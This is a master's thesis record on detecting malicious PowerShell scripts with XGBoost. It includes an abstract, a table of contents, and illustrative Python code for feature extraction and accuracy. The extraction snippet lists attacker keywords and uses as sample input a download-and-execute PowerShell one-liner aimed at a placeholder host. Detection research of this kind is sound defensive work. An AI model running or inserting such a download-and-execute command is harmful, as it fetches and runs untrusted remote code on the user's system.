
Author: Hsiang-Hua Hung (洪湘嬅)
Thesis title: Machine Learning Approaches to Malicious PowerShell Scripts Detection and Feature Combination Analysis (機器學習應用於惡意 PowerShell 腳本檢測與特徵組合分析)
Advisor: Jiann-Liang Chen (陳俊良)
Oral defense committee: Sy-Yen Kuo (郭斯彥), Nen-Fu Huang (黃能富), Chu-Sing Yang (楊竹星), Ing-Yi Chen (陳英一), Jiann-Liang Chen (陳俊良)
Degree: Master
Department: College of Electrical Engineering and Computer Science, Department of Electrical Engineering
Year of publication: 2022
Academic year of graduation: 110 (ROC calendar)
Language: English
Number of pages: 59
Keywords (Chinese): 機器學習, XGBoost, PowerShell, 惡意腳本, 行為特徵分析
Keywords (English): Machine Learning, XGBoost, PowerShell, Malicious Scripts, Behavioral Features Analysis
    Advances in communication technology have made modern society more dependent than ever on the Internet and on user-friendly digital tools, and the digital age has brought many benefits to people's lives and economies. At the same time, cyber attackers use a variety of methods to break into computers, steal or hold hostage victims' data and devices, and profit from them. As malicious attack methods keep growing in number and novelty, innovative and effective defense technologies are needed.
    Windows PowerShell is Microsoft's command-line shell and scripting language built on the .NET Framework. It provides access to, and control over, files, processes, and the Windows API, and it helps system administrators automate operating-system tasks. Its flexibility, powerful structure, and ability to run scripts directly from the command line have made it a tool of choice for many attackers. In addition, attackers often apply obfuscation techniques to PowerShell scripts to evade detection by anti-virus software, which greatly reduces the scripts' readability.
    This study detects malicious PowerShell scripts by static analysis, inferring a script's behavioral intent mainly from its keywords, format, and string combinations. We extracted 33 features and divided them into two feature groups: Characteristic-based features, which are computed to capture specific phenomena or facts about a script, and Behavior-based features, which infer behavioral intent from keywords and commands. Behavior-based features are further divided into three types according to whether the behavior carries a positive, neutral, or negative meaning: Positive Behavior-based, Neutral Behavior-based, and Negative Behavior-based. Among these features, three were enhanced, and one feature used in other research was introduced.
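    The static feature extraction described above can be illustrated with a minimal Python sketch. It is not the thesis's feature set: this record does not list the 33 features, so the three computed features (length, character entropy, special-character ratio) and every keyword in `BEHAVIOR_KEYWORDS` are hypothetical stand-ins chosen only to show the two feature groups side by side.

```python
import math
import re
from collections import Counter

# Hypothetical keyword lists for illustration only; the actual keywords
# used by the thesis are not given in this record.
BEHAVIOR_KEYWORDS = {
    "positive": ["write-host", "get-help", "write-verbose"],
    "neutral": ["new-object", "get-process", "start-sleep"],
    "negative": ["downloadstring", "invoke-expression",
                 "frombase64string", "-encodedcommand"],
}


def shannon_entropy(text):
    """Shannon entropy of the character distribution, in bits per character."""
    if not text:
        return 0.0
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def extract_features(script):
    """Map a PowerShell script (given as a string) to a dict of numeric features."""
    lowered = script.lower()
    # Characteristic-based style features: values computed from the raw text.
    features = {
        "length": len(script),
        "entropy": shannon_entropy(script),
        "special_char_ratio": (
            len(re.findall(r"[^A-Za-z0-9\s]", script)) / len(script)
            if script else 0.0
        ),
    }
    # Behavior-based style features: case-insensitive keyword hits per group.
    for group, keywords in BEHAVIOR_KEYWORDS.items():
        features[group + "_hits"] = sum(lowered.count(k) for k in keywords)
    return features


# Example input; the URL is a placeholder, not a real resource.
sample = "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
print(extract_features(sample))
```

    Each script becomes one fixed-length numeric vector, which is the form a tree-based classifier expects. Plain substring counting is used here for brevity; it would miss obfuscated keywords, which is one reason a real feature set needs more than keyword matching.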
    An XGBoost model was used to evaluate the importance of each proposed feature and to identify the feature combination that contributes most to detecting malicious PowerShell scripts. The model trained on the combined feature set performed best, achieving 99.27% accuracy on the validation dataset. These results indicate that the proposed malicious PowerShell script detection model outperforms those of previous studies.
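    For readers unfamiliar with the reported metric, the sketch below shows how accuracy is conventionally computed from binary predictions, assuming the label 1 means malicious and 0 means benign. The function names and the toy labels are illustrative assumptions and are not data from the thesis.

```python
def confusion_counts(y_true, y_pred):
    """Return (TP, TN, FP, FN) for binary labels, where 1 = malicious, 0 = benign."""
    tp = tn = fp = fn = 0
    for truth, pred in zip(y_true, y_pred):
        if truth not in (0, 1) or pred not in (0, 1):
            raise ValueError("labels must be 0 or 1")
        if truth == 1 and pred == 1:
            tp += 1
        elif truth == 0 and pred == 0:
            tn += 1
        elif truth == 0 and pred == 1:
            fp += 1
        else:  # truth == 1 and pred == 0
            fn += 1
    return tp, tn, fp, fn


def accuracy(y_true, y_pred):
    """Accuracy = (TP + TN) / (TP + TN + FP + FN); 0.0 for empty input."""
    tp, tn, fp, fn = confusion_counts(y_true, y_pred)
    total = tp + tn + fp + fn
    return (tp + tn) / total if total else 0.0


# Toy labels for illustration only.
y_true = [1, 1, 0, 0, 1]
y_pred = [1, 0, 0, 0, 1]
print(confusion_counts(y_true, y_pred), accuracy(y_true, y_pred))
```

    Accuracy alone can be misleading when malicious and benign scripts are unevenly represented, so it is usually read together with the underlying confusion counts.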

    Abstract (Chinese)
    Abstract
    List of Figures
    List of Tables
    Chapter 1 Introduction
        1.1 Motivation
        1.2 Contributions
        1.3 Organization
    Chapter 2 Related Work
        2.1 PowerShell Malware Threats
        2.2 Deobfuscation Techniques
        2.3 Detection of Malicious PowerShell Scripts
    Chapter 3 Proposed System
        3.1 System Architecture
        3.2 Data Collection
            3.2.1 Crawler Technology
            3.2.2 Data Source
        3.3 Data Preprocessing
            3.3.1 Data Cleaning
            3.3.2 Data Integration
        3.4 Feature Definition
            3.4.1 Characteristic-based Features
            3.4.2 Positive Behavior-based Features
            3.4.3 Neutral Behavior-based Features
            3.4.4 Negative Behavior-based Features
        3.5 Detection Model Architecture
    Chapter 4 Performance Analysis
        4.1 System Environment and Parameter Settings
        4.2 Performance Evaluation Metrics
        4.3 Performance Analysis
            4.3.1 Feature Analysis of Characteristic-based
            4.3.2 Feature Analysis of Positive Behavior-based
            4.3.3 Feature Analysis of Neutral Behavior-based
            4.3.4 Feature Analysis of Negative Behavior-based
            4.3.5 Feature Analysis of All Features
        4.4 Comparison of Different Study
        4.5 Summary
    Chapter 5 Conclusions and Future Works
        5.1 Conclusions
        5.2 Future Works
    References

